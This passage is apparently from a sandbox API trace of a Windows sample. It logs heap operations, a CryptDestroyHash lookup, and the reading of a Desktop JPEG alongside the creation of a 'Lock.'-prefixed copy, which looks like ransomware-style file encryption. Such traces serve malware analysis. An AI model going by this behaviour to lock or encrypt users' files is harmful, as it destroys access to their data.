lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e10 [0188.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0188.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.729] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0188.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.729] CryptDestroyHash (hHash=0xaa5860) returned 1 [0188.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.732] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0188.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.736] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.736] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.736] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.736] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/QHREQz7Xz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qhreqz7xz.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0188.737] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.737] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0188.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0188.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.QHREQz7Xz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.qhreqz7xz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0188.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0188.739] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.739] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.739] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.739] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.739] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0188.739] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0xad35, lpOverlapped=0x0) returned 1 [0188.741] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0188.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xad35) returned 0x24c7a50 [0188.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.743] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0188.743] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0188.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xad35) returned 0x24c7a50 [0188.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0188.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.743] RtlAllocateHeap 